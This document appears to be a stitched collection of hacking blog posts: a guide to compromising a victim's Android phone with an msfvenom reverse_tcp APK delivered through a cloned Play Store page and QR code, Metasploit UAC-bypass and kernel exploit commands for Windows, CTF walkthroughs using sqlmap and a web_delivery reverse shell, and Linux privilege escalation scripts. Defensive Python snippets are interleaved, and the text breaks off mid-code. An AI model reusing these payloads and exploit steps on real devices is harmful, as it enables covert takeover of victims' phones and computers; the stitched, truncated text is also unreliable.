
Hack Android Phone using HTA Attack with QR Code


A QR code is a two-dimensional barcode that can be scanned with a smartphone or a dedicated QR reader. QR codes can link directly to contact numbers, websites, usernames, photos, SMS, e-mails and even encrypted data, and they do not end there. QR codes are a big deal in Japan, and with their growing use in SEO it is just a matter of time before they take over the whole world.

By now every one of you must have understood that QR codes are the 'next big thing'; let's make them a big thing in regard to hacking. Yes! In this article we are going to hack our victim's mobile in a few easy steps using a QR code, and all you need for this is your beloved Kali Linux.

Our first step is to create a malicious APK using msfvenom.

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will turn the HTA attack into an APK attack to gain access to the victim's smartphone. From the SET menu select the 2nd option, Website Attack Vectors.

Then select the 8th option, HTA Attack Method.

Then select Site Cloner by typing 2.

When you type option 2, it asks you to enter the URL you want to clone. Here give the URL of the Play Store: https://play.google.com/store

When it asks you to select the meterpreter option, type 3, as we want reverse_tcp.

Next, copy the Launcher.apk that you created with msfvenom to /var/www/html/

Also rename the Launcher.hta that SET has just created to launcher.apk, as shown below.

Now add the QR Code Extension to your Chrome browser.

The QR Code Extension will generate a QR code for the URL of your attack.

Now start multi/handler so that the session is caught as soon as it arrives. For this, type:

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.100

set lport 6666

run

Now get the victim to scan your code and install the app.

And voila! As soon as the code has been scanned and the app installed, you will have your meterpreter session.
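Looking at the same flow from the other side, here is a small Python check (added here, not from the original post) for triaging a scanned QR payload before installing anything it points to. The trusted-host list and the sample URLs are constructed for illustration; the attack above relies on exactly the signals it flags: a cloned Play Store page with an APK or HTA served from the attacker's own address instead of play.google.com.

```python
"""Triage a scanned QR payload before installing anything it points to.

Added example (not from the original post). Models the defensive view of the
attack above: a Play Store look-alike page serving an APK from the attacker's
own address. TRUSTED_APP_HOSTS and the sample URLs are constructed.
"""
from ipaddress import ip_address
from urllib.parse import urlsplit

# Hosts from which an app install is expected (constructed allow-list).
TRUSTED_APP_HOSTS = {"play.google.com"}
INSTALLABLE = (".apk", ".hta")


def _is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def triage_qr_payload(payload):
    """Return {'verdict': 'allow'|'block'|'not_a_url', 'reasons': [...]}."""
    if "://" not in payload:
        return {"verdict": "not_a_url", "reasons": ["payload is not a URL"]}
    parts = urlsplit(payload)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    reasons = []

    if parts.scheme != "https":
        reasons.append("not served over HTTPS")
    if _is_ip_literal(host):
        # A listener on a bare IP is what a cloned-site attack typically uses.
        reasons.append("host is a raw IP address")
    # Substring matches are the classic look-alike trick: play.google.com.example
    # contains the trusted name but is a different registrable domain.
    if host not in TRUSTED_APP_HOSTS and any(t in host for t in TRUSTED_APP_HOSTS):
        reasons.append("host imitates a trusted app store domain")
    if path.endswith(INSTALLABLE) and host not in TRUSTED_APP_HOSTS:
        reasons.append("direct download of an installable file from an untrusted host")

    return {"verdict": "block" if reasons else "allow", "reasons": reasons}


if __name__ == "__main__":
    for url in ("https://play.google.com/store",
                "http://192.168.1.100/launcher.apk",
                "https://play.google.com.example/app.apk"):
        print(url, triage_qr_payload(url))
```

Any agent that handles scans on the phone side can call triage_qr_payload and refuse or warn on a block verdict. The substring test is deliberately strict; a production version would compare registrable domains with a public-suffix library instead.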

Author: Shivam Gupta is an Ethical Hacker, Cyber Security Expert and Penetration Tester from India. You can contact him here.

The post Hack Android Phone using HTA Attack with QR Code appeared first on Hacking Articles.


7 Ways to Get Admin Access of Remote Windows PC (Bypass Privilege Escalation)


When you exploit the victim's PC there are certain limits that prevent some actions even after you have a shell on it. To get complete access to the victim's PC you need privilege escalation, where a user obtains privileges they are not authorized to have. These privileges can be used to delete files, view private information or install unwanted programs such as viruses. Metasploit has various post-exploitation modules that use a number of different techniques to attempt to gain SYSTEM-level privileges on the remote system.

Requirements

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali Linux terminal and type msfconsole.

Use a Windows payload and start multi/handler for the reverse connection. Once you have hacked the victim PC, go for privilege escalation using the following techniques.

Windows Escalate UAC Protection Bypass

Available targets: Windows 32-bit and 64-bit

This module bypasses Windows UAC by utilizing the trusted publisher certificate through process injection. It spawns a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

Look at the image: when you run the getuid command it shows the user ID, that is the username (pc 10); after using getsystem the username is SYSTEM. Run getuid again and you now have admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

Available targets: Windows 32-bit and 64-bit

This module bypasses Windows UAC by utilizing the trusted publisher certificate through process injection. It spawns a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three separate binaries of the standard technique. However, it requires the correct architecture to be selected (use x64 for SYSWOW64 systems as well). If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

Run getsystem, then check the user ID by typing getuid in meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

Available targets: Windows 32-bit and 64-bit

This module bypasses Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

Run getsystem, then check the user ID by typing getuid in meterpreter.

Windows Escalate UAC Execute RunAs

Available targets: Windows 32-bit and 64-bit

This module attempts to elevate the execution level using the undocumented ShellExecute RunAs flag to bypass low UAC settings. It always uses a self-generated payload, which is easily detected by AV. The user must click Yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

Run getsystem, then check the user ID by typing getuid in meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows 32-bit and 64-bit

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect Windows 7 to 10 and Server 2008 to 2012, 32- and 64-bit. The module only works against those versions of Windows with PowerShell 2.0 or later and on systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Run getsystem, then check the user ID by typing getuid in meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Available targets: Windows 32-bit

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module spawns a process on the target system and elevates its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) > set session 1

msf exploit(ms16_016_webdav) > exploit

Run getsystem in meterpreter to get admin access to the PC.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

Available targets: Windows 7 32-bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL of the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used at Pwn2Own 2013 by MWR to break out of Chrome's sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogon.exe is likely to crash.

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > exploit

Run getsystem, then check the user ID by typing getuid in meterpreter.
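All of the UAC-bypass modules above depend on the UAC policy of the target, so here is the defender's check: a Python function (added here, not part of the original post or of Metasploit) that grades a host's policy values against them. The registry value names are the real ones under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System; the snapshots fed to it are constructed, and the mapping of policy level to bypass class is my reading of the module descriptions above (the auto-elevation bypasses need the default or "never notify" level, the ask module needs an administrator who clicks Yes), so treat it as an assumption to verify against your own builds.

```python
"""Grade a Windows host's UAC policy against the bypass classes above.

Added example, not from the original post or from Metasploit. The value
names are the real ones under
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System;
the host snapshots are constructed and passed in as dicts so this runs
offline (on a live host, read them with winreg).
"""

UAC_LEVEL_NAMES = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop (Always notify)",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries (default)",
}


def assess_uac(policy, user_is_local_admin):
    """Return a list of findings; an empty list means nothing to fix.

    policy: {'EnableLUA': int, 'ConsentPromptBehaviorAdmin': int,
             'PromptOnSecureDesktop': int}  (missing keys = Windows defaults)
    """
    findings = []
    if not user_is_local_admin:
        # Every module in this article needs a token that can be elevated;
        # a standard user has nothing for a UAC bypass to unlock.
        return findings
    findings.append("interactive user is a local administrator; UAC is the only gate")

    if policy.get("EnableLUA", 1) == 0:
        findings.append("EnableLUA=0: UAC is disabled, admin processes start fully elevated")
        return findings

    level = policy.get("ConsentPromptBehaviorAdmin", 5)
    name = UAC_LEVEL_NAMES.get(level, "unknown")
    if level in (0, 5):
        # Assumption from the module text: the bypassuac / bypassuac_injection /
        # bypassuac_vbs class rides on auto-elevation of trusted binaries, which
        # Windows only performs at these two levels.
        findings.append(
            f"ConsentPromptBehaviorAdmin={level} ({name}): auto-elevation bypasses "
            "are possible; set it to 2 (Always notify)")
    if policy.get("PromptOnSecureDesktop", 1) == 0:
        # Without the secure desktop, other processes can interact with the prompt.
        findings.append("PromptOnSecureDesktop=0: consent prompt is not isolated from other processes")
    return findings


# Constructed snapshots: a default Windows 7 install and a hardened one.
DEFAULT_POLICY = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}
HARDENED_POLICY = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 2, "PromptOnSecureDesktop": 1}

if __name__ == "__main__":
    for label, pol in (("default", DEFAULT_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, assess_uac(pol, user_is_local_admin=True))
```

The one finding that survives the hardened policy is the user being a local administrator, which is the real fix: none of these modules, the ask module included, have anything to elevate when the day-to-day account is a standard user.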

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant and a lover of social media and gadgets. Contact here.


Hack the SkyDog Con CTF 2016 – Catch Me If You Can VM


SkyDog is the second VM in the Root2Boot CTF series created by James Brower. It is configured with DHCP, so an IP will be assigned to it automatically. The VM is based on Catch Me If You Can, a movie about Frank, who is a conman, so it is fair to assume that a broad OSINT concept will be used in it. This is an amazing VM, as it tests both hacking and forensic skills. The author has given us hints about all eight flags, as below:

Flag #1 : Don’t go Home Frank! There’s a Hex on Your House.

Flag #2 : Obscurity or Security?

Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

Flag #4 : A Good Agent is Hard to Find.

Flag #5 : The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 :  Where in the World is Frank?

Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!

Flag #8 : Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Apart from this, we know that the flags are MD5 hashes. You can download the VM from: https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/.

WalkThrough

Let us find our target first.

netdiscover

Now that we know our target is 192.168.1.27, let's fire up an nmap scan.

nmap -p- -A 192.168.1.27

Nmap shows that four ports are open: 22 (SSH, closed), 80 (HTTP), 443 (HTTPS) and 22222 (SSH, open).

Port 80 is open as well as 443, so let's open our target in the browser and see what we can find there.

There was nothing on the webpage except the information on the lab, so I looked at its page source.

In the page source there was a directory, /oldie/html5.js. I opened it and found the page very confusing, but then I looked at the first flag's hint, Flag #1: Don't go Home Frank! There's a Hex on Your House. Then it clicked: the hint says something about hex, so the first line is our first flag, in hex.

So I copied it and pasted it into asciitohex.com, which decodes the hex and gives you the first flag as an MD5 hash value.

Use an online MD5 cracker to crack the hash, as we have done in the following image:

Our first flag is nmap. As we already know, this is the hint for the next flag, which means our next flag is related to nmap. So I looked closely at all the ports and decided to open SSH, which was open on port 22222.

And yes! We have found our second flag. Let's crack its hash value.

Our second flag is encrypt, which means our third flag is related to encryption. Let's check the hint given for the third flag: Flag #3: Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic. The hint says something about intercepting traffic, and intercepting traffic is related to the SSL certificate. To check the certificate, click on the Secure Connection (padlock) logo and then click on the arrow for the next menu.

From the drop-down menu that appears, select More Information.

It will open a dialogue box like the one shown below:

From this dialogue box, select the Security tab and then click on the View Certificate button. In the certificate you will find the third flag.

Again, crack it with the MD5 cracker.
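The first three flags all follow the same recipe: hex text wrapping the MD5 digest of a short word, then a dictionary lookup, which is all an online MD5 cracker does. The Python below (added here, not part of the walkthrough) carries that recipe through end to end. The word list is constructed and the flag values are computed with hashlib rather than copied from the VM, so it runs offline; the lesson is the one in the flag #5 hint, that an MD5 of a simple, guessable word is no protection.

```python
"""Recover a SkyDog-style flag: hex-encoded text that is itself the MD5
hash of a dictionary word.

Added example, not part of the original walkthrough. Flag values are
computed here with hashlib, and WORDLIST is a constructed sample.
"""
import binascii
import hashlib
from typing import Iterable, Optional

HEXDIGITS = set("0123456789abcdef")


def hex_decode(hex_text: str) -> str:
    """Step 1 of the walkthrough: turn the hex found in html5.js back into text."""
    return binascii.unhexlify("".join(hex_text.split())).decode("ascii")


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_md5(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Step 2: the 'online MD5 cracker' is a lookup over candidate words."""
    digest = digest.strip().lower()
    if len(digest) != 32 or set(digest) - HEXDIGITS:
        return None  # not an MD5 digest at all
    for word in wordlist:
        if md5_hex(word) == digest:
            return word
    return None


def encode_flag(word: str) -> str:
    """How a flag like #1 can be built: MD5 of the word, then hex of that text."""
    return binascii.hexlify(md5_hex(word).encode("ascii")).decode("ascii")


def recover_flag(hex_text: str, wordlist: Iterable[str]) -> Optional[str]:
    """Both steps together: hex -> digest -> word."""
    return crack_md5(hex_decode(hex_text), wordlist)


# Constructed word list; a real run would use rockyou.txt or similar.
WORDLIST = ["password", "ssh", "nmap", "encrypt", "personnel", "evidence"]

if __name__ == "__main__":
    flag1 = encode_flag("nmap")
    print("hex on the page :", flag1)
    print("decoded digest  :", hex_decode(flag1))
    print("recovered word  :", recover_flag(flag1, WORDLIST))
```

Flags #2 and #3 are bare digests, so for them only crack_md5 is needed. The lookup is linear here; a real cracker precomputes the digests of the whole word list once, which is why "simple, guessable or personal" values fall in seconds.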

So our third flag is personnel. This could be a directory, so open it in the browser.

When we open the personnel directory, it says that access is denied. That means there is a login portal somewhere here to which our access is denied. So I went back to the previous directory we had found and explored a bit, and found that the FBI workstations run on MSIE 4.0, which means the problem was the browser.

Now I could not find any User-Agent string with MSIE 4.0 in it, so I decided to use BurpSuite. I captured its cookies.

In the captured request you can see that the browser used is Linux x86_64. I changed it to MSIE 4.0 as shown below:

When I then forwarded the request through BurpSuite, the page opened in the browser, giving us our fourth flag.

Now decode this flag's value and add 'new' to it.

Upon cracking, our flag is evidence, and by adding new to it our fourth flag becomes newevidence. This again could be a directory like the previous flags. Open it in the browser.

And yes!! We have a login portal. Here, for the username and the password, I figured OSINT must have been used. So I gathered every piece of information about the movie I could, and I even watched the movie. For two whole days I searched and searched, but alas! I found nothing. Then I referred to the author's walkthrough and got the username and password, which are carl.hanratty and Grace respectively.

Now, upon login, the newevidence directory opens.

There was nothing on the page, so I looked at the page source.

In the page source we found three directories, of which invoice.pdf proved to be useless. LOL! But not to worry, we have the other two. Let's open Evidence.txt.

And yes! We have found our fifth flag. Upon cracking the MD5 value, the flag is panam. Five flags down, four to go.

Now let's have a look at the other directory we had found.

Save this image. I tried to read the image with exiftool, but it did not work, so I tried steghide.

steghide extract -sf image.jpg

We have our sixth flag now, which is ILoveFrance. You can decode this flag's MD5 value, but it will still give ILoveFrance. We also have a clue, iheartbrenda. Both the flag and the clue are important; make a note of them.

For our seventh flag we have the hint: Flag #7: Frank Was Caught on Camera Cashing Checks and Yelling – I'm The Fastest Man Alive! The hint says "I am the fastest man alive", which is the catchphrase of The Flash, and in the movie Frank uses the fake name Barry Allen.

This can be our username. Let's log in through the SSH port using the username barryallen. When it asked for a password I tried both ILoveFrance and iheartbrenda, and fortunately iheartbrenda was the correct password.

To get root access we used the web_delivery exploit, with a Python script. To do so, open Metasploit by typing msfconsole in the Kali terminal and then type:

use exploit/multi/script/web_delivery

set target 0

set payload python/meterpreter/reverse_tcp

set lhost 192.168.1.21

set lport 4444

exploit

It will generate a one-line command. Copy that command and paste it into the SSH session on the target.

As soon as you hit enter, a meterpreter session will open; then type:

sessions -i 1

pwd

ls

It will show a flag.txt, but this is not our last flag, as it is not in the form of an MD5 hash, as the creator instructed.

I explored a lot here and then downloaded security-system.data.zip, as I had an instinct that it could be useful. This was a RAM dump, which I read using Volatility. For this, type:

volatility-2.3.1.standalone.exe -f security-system.data.zip imageinfo

volatility-2.3.1.standalone.exe -f security-system.data.zip --profile=WinXPSP2x86 consoles

And we have captured our last flag. HURRAAYYYYY!!!!!! All the flags have been captured. Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.


4 Ways to get Linux Privilege Escalation


When you exploit the victim's PC there are certain limits that prevent some actions even after you have a shell on it. To get complete access to the victim's PC you need privilege escalation, where a user obtains privileges they are not authorized to have. These privileges can be used to delete files, view private information or install unwanted programs such as viruses. Metasploit has various post-exploitation modules that use a number of different techniques to attempt to gain system-level privileges on the remote system. Apart from those, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. These are generally aimed at enumeration rather than at specific vulnerabilities/exploits, and can save you a lot of time.

Use a Linux payload and start multi/handler for the reverse connection. Once you have hacked the victim PC, go for privilege escalation using the following scripts.

LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks. A shell script that enumerates the system configuration. A high-level summary of the checks/tasks performed by LinEnum:

Privileged access: diagnoses whether the current user has sudo access without a password and whether root's home directory is accessible.

System information: hostname, networking details, current IP, etc.

User information: current user, list of all users including uid/gid information, list of root accounts, checks whether password hashes are stored in /etc/passwd.

Kernel and distribution release details.

git clone https://github.com/rebootuser/LinEnum.git

Once you have downloaded this script you can simply run it by typing ./LinEnum.sh in the terminal. It will dump all the fetched data and system details.

./LinEnum.sh
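To see what the "privileged access" and "user information" checks actually look for, here is a Python audit (added here, not LinEnum's own code) that applies the same checks to /etc/passwd and sudoers text: extra uid-0 accounts, password hashes kept in /etc/passwd, and NOPASSWD sudo rules. The inputs below are constructed samples so it runs offline; on a real host, feed it the contents of /etc/passwd and of /etc/sudoers (or the output of sudo -l).

```python
"""Audit /etc/passwd and sudoers text for the conditions LinEnum enumerates.

Added example, not LinEnum's code. Inputs are constructed samples; on a real
host pass open('/etc/passwd').read() and the sudoers file contents.
"""
import re

PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:backdoor:/root:/bin/bash
www:$6$saltsalt$abcdefghijklmnopqrstuvwxyz0123456789:33:33:www:/var/www:/bin/sh
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""  # constructed

SUDOERS_SAMPLE = """Defaults env_reset
root ALL=(ALL:ALL) ALL
alice ALL=(ALL) NOPASSWD: /usr/bin/vim
%admin ALL=(ALL) ALL
"""  # constructed

# user  host=(runas) [TAG: ...] commands
SUDO_RULE = re.compile(
    r"^(?P<who>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Values in the password field that mean "no hash here".
NO_HASH = ("x", "*", "!", "!!", "")


def audit_passwd(text):
    """Flag uid-0 accounts other than root and hashes stored in /etc/passwd."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"malformed passwd entry: {line!r}")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"extra uid-0 account: {name}")
        if pw not in NO_HASH:
            # World-readable hash: anyone can take it offline and crack it.
            findings.append(f"password hash stored in /etc/passwd for {name}")
    return findings


def audit_sudoers(text):
    """Flag NOPASSWD rules, i.e. sudo access without a password."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SUDO_RULE.match(line)
        if m and "NOPASSWD" in m.group("tags"):
            findings.append(f"{m.group('who')} may run {m.group('cmds').strip()} "
                            f"as {m.group('runas')} without a password")
    return findings


def audit(passwd_text, sudoers_text):
    return audit_passwd(passwd_text) + audit_sudoers(sudoers_text)


if __name__ == "__main__":
    for finding in audit(PASSWD_SAMPLE, SUDOERS_SAMPLE):
        print("-", finding)
```

Each finding is one of the lines LinEnum would print under its own headings; the difference is that here the checks are explicit, so you can run them from a config-management hook rather than from a foothold.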

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits particular to the system that has been taken over. To download the script, click on the link http://www.securitysift.com/download/linuxprivchecker.py

Now to use this script just type python linuxprivchecker.py in the terminal, and this will enumerate file and directory permissions/contents. This script works in the same way as LinEnum and hunts for details related to the system, network and users.

python linuxprivchecker.py

Linux Exploit Suggester

It is based on the operating system release number. The program performs a 'uname -r' to grab the Linux kernel release version and returns a suggested list of possible exploits. It is additionally possible to provide the '-k' flag to enter the kernel version manually. It is a Perl script and does not do exactly the same as the scripts above. Type the following to download it:

git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git

If you know the kernel version, execute the script directly by typing the following in the terminal:

./Linux_Exploit_Suggester.pl -k 3.5

If not, run uname -r to find the version of your kernel, then use the above command with your kernel version in place of mine. It then suggests possible exploits for privilege escalation.

Unix-Privesc-checker

A shell script to check privilege escalation vectors on UNIX systems. Unix-privesc-check is a script that runs on UNIX and Linux systems. It seeks to find misconfigurations that could allow unauthorized users to escalate privileges to other users or to access local applications.

It is written as a single shell script so it can be easily uploaded and executed. It can be executed either as a normal user or as root. When it finds a group-writable file or directory, it only flags an issue if that group has more than one non-root member.

To download this script, type the following in the terminal:

git clone https://github.com/pentestmonkey/unix-privesc-check.git

Enter the folder and execute the script by typing the following:

unix-privesc-check standard

You can also see the way I am using these scripts in the given images, which may help you understand better. Similarly, use the following command for the same purpose:

unix-privesc-check detailed

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant and a lover of social media and gadgets. Contact here.


Hack the Seattle VM (CTF Challenge)


This is another article in the Boot2Root series of CTF challenges. This lab was prepared by HollyGraceful. It is just a preview of the original lab, which simulates an e-commerce web application containing common security errors. The current vulnerabilities are listed below:

  • SQL Injection (Error-based)
  • SQL Injection (Blind)
  • Reflected Cross-Site Scripting
  • Stored Cross-Site Scripting
  • Insecure Direct-Object Reference
  • Username Enumeration
  • Path Traversal
  • Exposed phpinfo()
  • Exposed Administrative Interface
  • Weak Admin Credentials

WalkThrough

Firstly, let’s locate our target.

Our target is 192.168.1.8. Let’s scan it with nmap.

nmap -p- -A 192.168.1.8

The only port we found open was 80. Next we fire up nikto.

nikto -h 192.168.1.8

Through nikto we discovered two directories: /admin/ and /images/. OK! We made a mental note of them and moved on to opening our target in the browser.

Opening it in the browser, we found that it was an e-commerce site, as hinted by the author. We checked every tab but found nothing, except in the blog tab.

In the blog tab, when you hover the mouse pointer over 'Admin' in the phrase 'Hey Admin!', it changes from an arrow to a hand, which indicates that it is a link and will open something when clicked.

When you click on it, it shows the username admin. OK! I made a note of it. Let's now check the clothing tab.

There is nothing useful in this tab. As the author hinted that the website is vulnerable to SQL injection, let's try one. This time let's try a different SQL attack, using BurpSuite. Capture the cookies of the webpage through BurpSuite.

Copy the cookie string and paste it into a plain text file.

Then start the SQL attack by typing the following command in the terminal of Kali.

sqlmap -r /root/Desktop/sea.txt --dbs

Here,

/root/Desktop/sea.txt is the path of the text file in which we saved the cookies.

This command will give us the names of the following databases.

Out of these databases we will dump the tables of seattle with the following command:

sqlmap -r /root/Desktop/sea.txt -D seattle --tables

And with that we will have the names of all the tables, as you can see in the following image.

Next we will dump the columns of the table with the following command:

sqlmap -r /root/Desktop/sea.txt -D seattle -T tblMembers --columns

The execution of the above command will show the column names as follows:

Among the columns there is a column named password. We already have the admin's username and only want the password, so we will dump the contents of the password column.

sqlmap -r /root/Desktop/sea.txt -D seattle -T tblMembers -C password --dump

And voila! We have the password, i.e. Assasin1

Now, in the browser, go to the My Account tab, where you will find a login portal. Give the admin's username and password and click on Login.

And you will be logged in as the admin.

This CTF does not contain any flag. All that was required was to get admin access, and yoohoo! We have that.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.


Hack the Billy Madison VM (CTF Challenge)


Today in our CTF challenges we are going to do Billy Madison. This VM is based on the 90s movie Billy Madison, hence the name. The main aim of this VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy's 12th grade final project. You will probably need to root the VM to complete this objective. Without further ado, let's start.

Download the lab from: https://www.vulnhub.com/entry/billy-madison-11,161/

WalkThrough

Let’s locate our target first.

netdiscover

Our target is 192.168.1.103. Scan it with nmap.

nmap -p- -A 192.168.1.103

Okay! So from nmap we discovered the ports 22, 23, 69, 80, 137, 138, 139, 445 and 2525. So I opened our target in the browser at port 69.

A WordPress website opens. I explored this a lot and tried to exploit it, but it was useless. So I simply opened our target in the browser at its default port, i.e. 80. The following page opens.

Then I explored smb port.

smbclient -L 192.168.0.103

When it asks for a password, just hit enter without entering one.

It just told us that the backdoors are currently closed. So then I tried telnet.

telnet 192.168.0.103

There was a message in telnet giving us a password, which had been encrypted with ROT13 (hint: ROTten). Let's decode it.

Decrypted, it comes out as exschmenuating. This could be a directory, so I opened it in the browser.

In the browser it opened a webpage which gave us a few hints for moving forward. From it we can conclude that there is a .cap file, that it is saved under a name which includes 'veronica', and that the name can be derived from rockyou.txt.

Now there are many names in rockyou.txt, but we only need the ones with veronica in them, and for that use the following command:

grep -i veronica /usr/share/wordlists/rockyou.txt > /root/Desktop/dict.txt

Executing the above command creates a text file containing the names with veronica in them. Now use this text file to find the file with veronica in its name through DirBuster. For this, open DirBuster, give the URL in the Target URL text box, then give the path of the text file you just created with grep. Give the directory name in the "Dir to start with" text box and then give cap as the file extension.

As a result it will show you the file 012987veronica.cap.

Open it in the browser. It will ask you to download it; go ahead.

Now check the TCP stream of every packet. In one of them you will find an email from Eric to Veronica, telling her to download a certain antivirus.

In another TCP stream you will find that Veronica has replied to Eric, asking him to share the link through the FTP server, along with a YouTube link.

In yet another TCP stream you will find that Eric has told her his username and password.

OK! So we have Eric's username and password. Keep them for later use. Meanwhile, let's check out the YouTube link.

In the video it says a combination of numbers. These numbers could be used for port knocking, so let's try it.

for x in 1466 67 1468 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 192.168.0.103; done

Then, to check, I fired up nmap again.

nmap -p- 192.168.0.103
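The knock sequence above never shows up as an open port, so the defender's only view of it is the firewall log. The Python below (added here, not part of the walkthrough) finds any source that sends the full sequence in order; the log lines are constructed in the shape of iptables LOG output (SRC=, DPT= fields), and the sequence is the one from the video.

```python
"""Spot a port-knock sequence in firewall log lines.

Added example, not part of the original walkthrough. LOG_SAMPLE is
constructed in the shape of iptables LOG output; KNOCK_SEQUENCE is the
one used on the VM above.
"""
import re
from collections import defaultdict

KNOCK_SEQUENCE = [1466, 67, 1468, 1514, 1981, 1986]

LOG_SAMPLE = """\
Jan 10 10:00:01 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40001 DPT=1466 SYN
Jan 10 10:00:01 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40002 DPT=67 SYN
Jan 10 10:00:02 vm kernel: IN=eth0 OUT= SRC=192.168.0.77 DST=192.168.0.103 PROTO=TCP SPT=51000 DPT=80 SYN
Jan 10 10:00:02 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40003 DPT=1468 SYN
Jan 10 10:00:03 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40004 DPT=1514 SYN
Jan 10 10:00:03 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40005 DPT=1981 SYN
Jan 10 10:00:04 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40006 DPT=1986 SYN
Jan 10 10:00:09 vm kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.103 PROTO=TCP SPT=40007 DPT=21 SYN
"""  # constructed

FIELDS = re.compile(r"SRC=(?P<src>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)")


def find_knockers(log_text, sequence=KNOCK_SEQUENCE):
    """Return the source IPs that sent the whole knock sequence, in order.

    Each source keeps a cursor into the sequence. A matching port advances
    it, an unrelated port is ignored (other traffic interleaves), and a port
    equal to the first knock restarts the sequence.
    """
    progress = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        m = FIELDS.search(line)
        if not m:
            continue
        src, dpt = m.group("src"), int(m.group("dpt"))
        if dpt == sequence[progress[src]]:
            progress[src] += 1
            if progress[src] == len(sequence):
                hits.append(src)
                progress[src] = 0
        elif dpt == sequence[0]:
            progress[src] = 1
    return hits


if __name__ == "__main__":
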